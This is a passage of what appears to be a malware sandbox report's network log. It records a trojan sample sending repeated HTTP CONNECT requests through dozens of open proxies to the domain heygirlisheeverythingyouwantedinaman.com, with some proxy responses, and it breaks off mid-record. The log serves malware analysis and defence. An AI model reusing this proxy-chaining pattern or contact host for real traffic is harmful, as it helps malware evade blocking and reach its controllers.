                                                                                1887192.168.2.855256183.56.243.20910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.445723057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1888192.168.2.855397138.201.21.218434785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.470231056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.807902098 CET24INHTTP/1.1 403 #string


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1889192.168.2.855307114.236.93.203155995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.537914991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.585597038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1890192.168.2.85514464.227.108.25319085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.537971020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1891192.168.2.85546593.190.24.1194435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.559573889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1892192.168.2.855409175.183.82.22181975828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.569941998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1893192.168.2.85542680.67.8.6805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.573647976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1894192.168.2.855467218.145.131.1824435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.595249891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1895192.168.2.85545345.11.95.16660125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.677659035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.025913954 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1896192.168.2.85541781.69.243.12610805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.706978083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1897192.168.2.855048125.227.225.15733895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.783823967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1898192.168.2.855461185.245.38.20041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.783988953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1899192.168.2.852552192.248.166.1388885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.785017967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882491112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.883598089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.991697073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1900192.168.2.85247450.63.12.10135805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.785269976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.846328974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1901192.168.2.85547645.61.188.134444995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.795933008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1902192.168.2.855500104.21.124.121805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.821261883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.908878088 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1903192.168.2.85550793.190.24.1194435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.823406935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1904192.168.2.85548172.210.221.22341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.823700905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1905192.168.2.85544949.228.131.16950005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.825869083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.578399897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1906192.168.2.85548431.148.207.153805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.863580942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.053884029 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1907192.168.2.855510218.145.131.1824435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.881124020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1908192.168.2.85549874.119.144.6041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.881419897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1909192.168.2.85551291.197.77.1184435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.881495953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1910192.168.2.852598103.13.112.8321225828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.881917953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1911192.168.2.85250578.28.152.111805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.882761002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.956911087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.057996988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:55.101094961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:07.116650105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:19.226365089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1912192.168.2.8554723.27.109.94567815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.940989017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.252257109 CET209INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.45
                                                                                Server: CompaqHTTPServer/9.9 HP System Management Homepage/3.0.1.73 httpd/2.2.6+
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1913192.168.2.855319192.252.216.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.955651045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1914192.168.2.852548205.233.79.2189995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.970457077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.190730095 CET202INHTTP/1.0 404 Not Found
                                                                                Content-Length: 818
                                                                                Content-Type: text/html
                                                                                Date: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Expires: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Server: Mikrotik HttpProxy
                                                                                Proxy-Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1915192.168.2.85255336.89.85.24956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.971710920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1916192.168.2.85530572.37.217.341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.972063065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1917192.168.2.8554925.44.42.82108085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.972306967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1918192.168.2.855519104.16.105.182805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.973918915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.061146975 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1919192.168.2.855483103.48.68.101835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.983686924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1920192.168.2.852203183.78.143.137295545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:42.983999968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.991786957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.991715908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.991816044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:58.897541046 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1921192.168.2.855508193.239.56.8480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.006486893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1922192.168.2.85495794.23.220.136252565828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.015113115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.194755077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1923192.168.2.855557218.145.131.1824435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.016602993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1924192.168.2.85555891.197.77.1184435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.019454002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1925192.168.2.8549498.242.178.69995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.019660950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.194807053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1926192.168.2.85555293.190.24.1194435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.051839113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1927192.168.2.855540199.60.103.160805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:43.368423939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.455885887 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1928192.168.2.855539172.64.207.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
